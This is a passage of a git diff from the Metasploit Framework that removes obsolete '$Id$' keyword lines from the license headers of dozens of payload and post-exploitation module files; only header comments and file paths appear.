-1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/stagers/windows/reverse_ipv6_https.rb b/modules/payloads/stagers/windows/reverse_ipv6_https.rb index a7a31b363c..42b1849f60 100644 --- a/modules/payloads/stagers/windows/reverse_ipv6_https.rb +++ b/modules/payloads/stagers/windows/reverse_ipv6_https.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb b/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb index 8cce2af465..7f0d1d5fbb 100644 --- a/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb +++ b/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/stagers/windows/reverse_nonx_tcp.rb b/modules/payloads/stagers/windows/reverse_nonx_tcp.rb index 28db7fbeaa..0cf63500aa 100644 --- a/modules/payloads/stagers/windows/reverse_nonx_tcp.rb +++ b/modules/payloads/stagers/windows/reverse_nonx_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/stagers/windows/reverse_ord_tcp.rb b/modules/payloads/stagers/windows/reverse_ord_tcp.rb index 043efe3d60..cebe5294c0 100644 --- a/modules/payloads/stagers/windows/reverse_ord_tcp.rb +++ b/modules/payloads/stagers/windows/reverse_ord_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/stagers/windows/reverse_tcp.rb b/modules/payloads/stagers/windows/reverse_tcp.rb index fa7c07b6f2..ed6da7da18 100644 --- a/modules/payloads/stagers/windows/reverse_tcp.rb +++ b/modules/payloads/stagers/windows/reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/stagers/windows/reverse_tcp_allports.rb b/modules/payloads/stagers/windows/reverse_tcp_allports.rb index c127734864..172e1efbda 100644 --- a/modules/payloads/stagers/windows/reverse_tcp_allports.rb +++ b/modules/payloads/stagers/windows/reverse_tcp_allports.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/stagers/windows/reverse_tcp_dns.rb b/modules/payloads/stagers/windows/reverse_tcp_dns.rb index 5221e6855e..3f96489fed 100644 --- a/modules/payloads/stagers/windows/reverse_tcp_dns.rb +++ b/modules/payloads/stagers/windows/reverse_tcp_dns.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/stagers/windows/x64/bind_tcp.rb b/modules/payloads/stagers/windows/x64/bind_tcp.rb index be3a296f0e..3bfab052d9 100644 --- a/modules/payloads/stagers/windows/x64/bind_tcp.rb +++ b/modules/payloads/stagers/windows/x64/bind_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/stagers/windows/x64/reverse_tcp.rb b/modules/payloads/stagers/windows/x64/reverse_tcp.rb index b5a9592f4c..2da6d6f5ee 100644 --- a/modules/payloads/stagers/windows/x64/reverse_tcp.rb +++ b/modules/payloads/stagers/windows/x64/reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/stages/bsd/x86/shell.rb b/modules/payloads/stages/bsd/x86/shell.rb index 4049629969..204026ede6 100644 --- a/modules/payloads/stages/bsd/x86/shell.rb +++ b/modules/payloads/stages/bsd/x86/shell.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/stages/bsdi/x86/shell.rb b/modules/payloads/stages/bsdi/x86/shell.rb index b82195df4b..976a1c6d50 100644 --- a/modules/payloads/stages/bsdi/x86/shell.rb +++ b/modules/payloads/stages/bsdi/x86/shell.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/stages/java/meterpreter.rb b/modules/payloads/stages/java/meterpreter.rb index 323a967051..6ce21d9f38 100644 --- a/modules/payloads/stages/java/meterpreter.rb +++ b/modules/payloads/stages/java/meterpreter.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/stages/java/shell.rb b/modules/payloads/stages/java/shell.rb index 6e819e6b3b..9872c881ff 100644 --- a/modules/payloads/stages/java/shell.rb +++ b/modules/payloads/stages/java/shell.rb @@ -1,8 +1,4 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/stages/linux/x64/shell.rb b/modules/payloads/stages/linux/x64/shell.rb index 2e3e5d97ba..d5088cb6aa 100644 --- a/modules/payloads/stages/linux/x64/shell.rb +++ b/modules/payloads/stages/linux/x64/shell.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/stages/linux/x86/meterpreter.rb b/modules/payloads/stages/linux/x86/meterpreter.rb index 0cc22ba0fc..518bcddca2 100644 --- a/modules/payloads/stages/linux/x86/meterpreter.rb +++ b/modules/payloads/stages/linux/x86/meterpreter.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/stages/linux/x86/shell.rb b/modules/payloads/stages/linux/x86/shell.rb index c6d7d0516b..cbcc8a5b2c 100644 --- a/modules/payloads/stages/linux/x86/shell.rb +++ b/modules/payloads/stages/linux/x86/shell.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/stages/netware/shell.rb b/modules/payloads/stages/netware/shell.rb index f7d125ecfc..b6ca10de12 100644 --- a/modules/payloads/stages/netware/shell.rb +++ b/modules/payloads/stages/netware/shell.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/stages/osx/armle/execute.rb b/modules/payloads/stages/osx/armle/execute.rb index 87838f405c..e32fa740b6 100644 --- a/modules/payloads/stages/osx/armle/execute.rb +++ b/modules/payloads/stages/osx/armle/execute.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/stages/osx/armle/shell.rb b/modules/payloads/stages/osx/armle/shell.rb index c8531735cb..1a3e176da4 100644 --- a/modules/payloads/stages/osx/armle/shell.rb +++ b/modules/payloads/stages/osx/armle/shell.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/stages/osx/ppc/shell.rb b/modules/payloads/stages/osx/ppc/shell.rb index 9185c1f350..4fc8efe2bf 100644 --- a/modules/payloads/stages/osx/ppc/shell.rb +++ b/modules/payloads/stages/osx/ppc/shell.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/stages/osx/x86/bundleinject.rb b/modules/payloads/stages/osx/x86/bundleinject.rb index f7aa13a237..bd0e5b3eb1 100644 --- a/modules/payloads/stages/osx/x86/bundleinject.rb +++ b/modules/payloads/stages/osx/x86/bundleinject.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/stages/osx/x86/isight.rb b/modules/payloads/stages/osx/x86/isight.rb index 398a6d5fc5..71e36caae2 100644 --- a/modules/payloads/stages/osx/x86/isight.rb +++ b/modules/payloads/stages/osx/x86/isight.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/stages/osx/x86/vforkshell.rb b/modules/payloads/stages/osx/x86/vforkshell.rb index f32e428dbe..06ba553a8a 100644 --- a/modules/payloads/stages/osx/x86/vforkshell.rb +++ b/modules/payloads/stages/osx/x86/vforkshell.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/stages/php/meterpreter.rb b/modules/payloads/stages/php/meterpreter.rb index fc618945a8..8a579589bc 100644 --- a/modules/payloads/stages/php/meterpreter.rb +++ b/modules/payloads/stages/php/meterpreter.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/stages/windows/dllinject.rb b/modules/payloads/stages/windows/dllinject.rb index 58726393ec..b46b21163e 100644 --- a/modules/payloads/stages/windows/dllinject.rb +++ b/modules/payloads/stages/windows/dllinject.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/stages/windows/meterpreter.rb b/modules/payloads/stages/windows/meterpreter.rb index 5d7d4a332c..41fc1d4f89 100644 --- a/modules/payloads/stages/windows/meterpreter.rb +++ b/modules/payloads/stages/windows/meterpreter.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/stages/windows/patchupdllinject.rb b/modules/payloads/stages/windows/patchupdllinject.rb index e0dc88504e..f55c463a8d 100644 --- a/modules/payloads/stages/windows/patchupdllinject.rb +++ b/modules/payloads/stages/windows/patchupdllinject.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/stages/windows/patchupmeterpreter.rb b/modules/payloads/stages/windows/patchupmeterpreter.rb index a3b0de3f09..2d620b23dc 100644 --- a/modules/payloads/stages/windows/patchupmeterpreter.rb +++ b/modules/payloads/stages/windows/patchupmeterpreter.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/stages/windows/shell.rb b/modules/payloads/stages/windows/shell.rb index 03699d1a7f..e3c587abdb 100644 --- a/modules/payloads/stages/windows/shell.rb +++ b/modules/payloads/stages/windows/shell.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/stages/windows/upexec.rb b/modules/payloads/stages/windows/upexec.rb index 71070e24db..f9946a0c69 100644 --- a/modules/payloads/stages/windows/upexec.rb +++ b/modules/payloads/stages/windows/upexec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/stages/windows/vncinject.rb b/modules/payloads/stages/windows/vncinject.rb index 98e0658c20..87cf0082d9 100644 --- a/modules/payloads/stages/windows/vncinject.rb +++ b/modules/payloads/stages/windows/vncinject.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/stages/windows/x64/meterpreter.rb b/modules/payloads/stages/windows/x64/meterpreter.rb index aed8aee6a3..bc7a6dcb3c 100644 --- a/modules/payloads/stages/windows/x64/meterpreter.rb +++ b/modules/payloads/stages/windows/x64/meterpreter.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/stages/windows/x64/shell.rb b/modules/payloads/stages/windows/x64/shell.rb index 1a9157bba8..5b5ded3cea 100644 --- a/modules/payloads/stages/windows/x64/shell.rb +++ b/modules/payloads/stages/windows/x64/shell.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/stages/windows/x64/vncinject.rb b/modules/payloads/stages/windows/x64/vncinject.rb index 699087fdaa..050bd09c20 100644 --- a/modules/payloads/stages/windows/x64/vncinject.rb +++ b/modules/payloads/stages/windows/x64/vncinject.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/aix/hashdump.rb b/modules/post/aix/hashdump.rb index bea8f49d13..33e3b7aae2 100644 --- a/modules/post/aix/hashdump.rb +++ b/modules/post/aix/hashdump.rb @@ -1,6 +1,3 @@ -# $Id$ -## - ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/cisco/gather/enum_cisco.rb b/modules/post/cisco/gather/enum_cisco.rb index c99aea134f..0450469bac 100644 --- a/modules/post/cisco/gather/enum_cisco.rb +++ b/modules/post/cisco/gather/enum_cisco.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/linux/gather/checkvm.rb b/modules/post/linux/gather/checkvm.rb index 8cbe54dedc..3e0a17b254 100644 --- a/modules/post/linux/gather/checkvm.rb +++ b/modules/post/linux/gather/checkvm.rb @@ -1,6 +1,3 @@ -# $Id$ -## - ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/linux/gather/hashdump.rb b/modules/post/linux/gather/hashdump.rb index 7199afe465..b336aa0ce7 100644 --- a/modules/post/linux/gather/hashdump.rb +++ b/modules/post/linux/gather/hashdump.rb @@ -1,6 +1,3 @@ -# $Id$ -## - ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/multi/gather/apple_ios_backup.rb b/modules/post/multi/gather/apple_ios_backup.rb index 65f2ee3b3f..3e6088542b 100644 --- a/modules/post/multi/gather/apple_ios_backup.rb +++ b/modules/post/multi/gather/apple_ios_backup.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/multi/gather/dns_bruteforce.rb b/modules/post/multi/gather/dns_bruteforce.rb index 3b55f64e32..89f062840b 100644 --- a/modules/post/multi/gather/dns_bruteforce.rb +++ b/modules/post/multi/gather/dns_bruteforce.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/multi/gather/dns_reverse_lookup.rb b/modules/post/multi/gather/dns_reverse_lookup.rb index b652bc0a32..e979d96f10 100644 --- a/modules/post/multi/gather/dns_reverse_lookup.rb +++ b/modules/post/multi/gather/dns_reverse_lookup.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/multi/gather/dns_srv_lookup.rb b/modules/post/multi/gather/dns_srv_lookup.rb index af7564c081..9f5f1dccb6 100644 --- a/modules/post/multi/gather/dns_srv_lookup.rb +++ b/modules/post/multi/gather/dns_srv_lookup.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/multi/gather/enum_vbox.rb b/modules/post/multi/gather/enum_vbox.rb index c2ec5a96eb..e275987c41 100644 --- a/modules/post/multi/gather/enum_vbox.rb +++ b/modules/post/multi/gather/enum_vbox.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/multi/gather/env.rb b/modules/post/multi/gather/env.rb index 21082df61a..89b0d792f4 100644 --- a/modules/post/multi/gather/env.rb +++ b/modules/post/multi/gather/env.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/multi/gather/filezilla_client_cred.rb b/modules/post/multi/gather/filezilla_client_cred.rb index 2ce2989a1f..598378d67b 100644 --- a/modules/post/multi/gather/filezilla_client_cred.rb +++ b/modules/post/multi/gather/filezilla_client_cred.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/multi/gather/find_vmx.rb b/modules/post/multi/gather/find_vmx.rb index cbde7b8b5d..c25f619df0 100644 --- a/modules/post/multi/gather/find_vmx.rb +++ b/modules/post/multi/gather/find_vmx.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/multi/gather/firefox_creds.rb b/modules/post/multi/gather/firefox_creds.rb index 36b3d2192f..2b8de7398d 100644 --- a/modules/post/multi/gather/firefox_creds.rb +++ b/modules/post/multi/gather/firefox_creds.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/multi/gather/gpg_creds.rb b/modules/post/multi/gather/gpg_creds.rb index 108bf474dd..87c038e36b 100644 --- a/modules/post/multi/gather/gpg_creds.rb +++ b/modules/post/multi/gather/gpg_creds.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/multi/gather/multi_command.rb b/modules/post/multi/gather/multi_command.rb index 97d856dd19..104e2d2f15 100644 --- a/modules/post/multi/gather/multi_command.rb +++ b/modules/post/multi/gather/multi_command.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/multi/gather/pidgin_cred.rb b/modules/post/multi/gather/pidgin_cred.rb index 20eb2c0d92..ed7c3b81c6 100644 --- a/modules/post/multi/gather/pidgin_cred.rb +++ b/modules/post/multi/gather/pidgin_cred.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/multi/gather/ping_sweep.rb b/modules/post/multi/gather/ping_sweep.rb index f9eb6e6904..0319bedcfa 100644 --- a/modules/post/multi/gather/ping_sweep.rb +++ b/modules/post/multi/gather/ping_sweep.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/multi/gather/run_console_rc_file.rb b/modules/post/multi/gather/run_console_rc_file.rb index 0b8f88355a..f3bb9d2179 100644 --- a/modules/post/multi/gather/run_console_rc_file.rb +++ b/modules/post/multi/gather/run_console_rc_file.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/multi/gather/skype_enum.rb b/modules/post/multi/gather/skype_enum.rb index cf801b37fb..69fac10f7f 100644 --- a/modules/post/multi/gather/skype_enum.rb +++ b/modules/post/multi/gather/skype_enum.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/multi/gather/ssh_creds.rb b/modules/post/multi/gather/ssh_creds.rb index e08cba4dd0..8b76fb58f6 100644 --- a/modules/post/multi/gather/ssh_creds.rb +++ b/modules/post/multi/gather/ssh_creds.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/multi/general/close.rb b/modules/post/multi/general/close.rb index 79bab5b8fa..21ac80101e 100644 --- a/modules/post/multi/general/close.rb +++ b/modules/post/multi/general/close.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/multi/general/execute.rb b/modules/post/multi/general/execute.rb index 5bd341fe80..4d53afa4a1 100644 --- a/modules/post/multi/general/execute.rb +++ b/modules/post/multi/general/execute.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/multi/manage/multi_post.rb b/modules/post/multi/manage/multi_post.rb index e5e2a89df4..4190cdced1 100644 --- a/modules/post/multi/manage/multi_post.rb +++ b/modules/post/multi/manage/multi_post.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/multi/manage/sudo.rb b/modules/post/multi/manage/sudo.rb index f80cbb92d3..69c94d3d85 100644 --- a/modules/post/multi/manage/sudo.rb +++ b/modules/post/multi/manage/sudo.rb @@ -1,6 +1,3 @@ -# $Id$ -## - ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/multi/manage/system_session.rb b/modules/post/multi/manage/system_session.rb index 0d602e684e..152517bed1 100644 --- a/modules/post/multi/manage/system_session.rb +++ b/modules/post/multi/manage/system_session.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/osx/gather/enum_osx.rb b/modules/post/osx/gather/enum_osx.rb index 61effe8e0f..7455b3dd7b 100644 --- a/modules/post/osx/gather/enum_osx.rb +++ b/modules/post/osx/gather/enum_osx.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/osx/gather/hashdump.rb b/modules/post/osx/gather/hashdump.rb index ff97c6ee46..d1f410ee59 100644 --- a/modules/post/osx/gather/hashdump.rb +++ b/modules/post/osx/gather/hashdump.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/solaris/gather/checkvm.rb b/modules/post/solaris/gather/checkvm.rb index b4c03e1eaa..d4bfb904f1 100644 --- a/modules/post/solaris/gather/checkvm.rb +++ b/modules/post/solaris/gather/checkvm.rb @@ -1,6 +1,3 @@ -# $Id$ -## - ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/solaris/gather/enum_packages.rb b/modules/post/solaris/gather/enum_packages.rb index 5d522d7143..a5690fbcd7 100644 --- a/modules/post/solaris/gather/enum_packages.rb +++ b/modules/post/solaris/gather/enum_packages.rb @@ -1,6 +1,3 @@ -# $Id$ -## - ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/solaris/gather/enum_services.rb b/modules/post/solaris/gather/enum_services.rb index c635a11bf2..44c866a3f4 100644 --- a/modules/post/solaris/gather/enum_services.rb +++ b/modules/post/solaris/gather/enum_services.rb @@ -1,6 +1,3 @@ -# $Id$ -## - ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/solaris/gather/hashdump.rb b/modules/post/solaris/gather/hashdump.rb index cdf975e3f6..ca410590a3 100644 --- a/modules/post/solaris/gather/hashdump.rb +++ b/modules/post/solaris/gather/hashdump.rb @@ -1,6 +1,3 @@ -# $Id$ -## - ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/capture/keylog_recorder.rb b/modules/post/windows/capture/keylog_recorder.rb index d0010eeb5d..b9b44b5358 100644 --- a/modules/post/windows/capture/keylog_recorder.rb +++ b/modules/post/windows/capture/keylog_recorder.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/capture/lockout_keylogger.rb b/modules/post/windows/capture/lockout_keylogger.rb index b0f2212751..094e3c0db8 100644 --- a/modules/post/windows/capture/lockout_keylogger.rb +++ b/modules/post/windows/capture/lockout_keylogger.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/escalate/bypassuac.rb b/modules/post/windows/escalate/bypassuac.rb index 209f7c4d78..b785b445e1 100644 --- a/modules/post/windows/escalate/bypassuac.rb +++ b/modules/post/windows/escalate/bypassuac.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/escalate/getsystem.rb b/modules/post/windows/escalate/getsystem.rb index cdab6d66ff..11743256cb 100644 --- a/modules/post/windows/escalate/getsystem.rb +++ b/modules/post/windows/escalate/getsystem.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/escalate/ms10_073_kbdlayout.rb b/modules/post/windows/escalate/ms10_073_kbdlayout.rb index c29b7828ba..d4af0d9549 100644 --- a/modules/post/windows/escalate/ms10_073_kbdlayout.rb +++ b/modules/post/windows/escalate/ms10_073_kbdlayout.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/escalate/net_runtime_modify.rb b/modules/post/windows/escalate/net_runtime_modify.rb index 5a24900366..2e2845d3fd 100644 --- a/modules/post/windows/escalate/net_runtime_modify.rb +++ b/modules/post/windows/escalate/net_runtime_modify.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/escalate/screen_unlock.rb b/modules/post/windows/escalate/screen_unlock.rb index 190acc99b8..450c721235 100644 --- a/modules/post/windows/escalate/screen_unlock.rb +++ b/modules/post/windows/escalate/screen_unlock.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/escalate/service_permissions.rb b/modules/post/windows/escalate/service_permissions.rb index 77780e2921..b460c9eba3 100644 --- a/modules/post/windows/escalate/service_permissions.rb +++ b/modules/post/windows/escalate/service_permissions.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/gather/arp_scanner.rb b/modules/post/windows/gather/arp_scanner.rb index 5a61c9c863..dd1b10f264 100644 --- a/modules/post/windows/gather/arp_scanner.rb +++ b/modules/post/windows/gather/arp_scanner.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/gather/bitcoin_jacker.rb b/modules/post/windows/gather/bitcoin_jacker.rb index 564127c8c1..31192c248a 100644 --- a/modules/post/windows/gather/bitcoin_jacker.rb +++ b/modules/post/windows/gather/bitcoin_jacker.rb @@ -1,5 +1,3 @@ -# $Id$ - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/gather/cachedump.rb b/modules/post/windows/gather/cachedump.rb index 7b4ecd6fe5..df7d5a11b5 100644 --- a/modules/post/windows/gather/cachedump.rb +++ b/modules/post/windows/gather/cachedump.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - # post/windows/gather/cachedump.rb ## diff --git a/modules/post/windows/gather/credentials/coreftp.rb 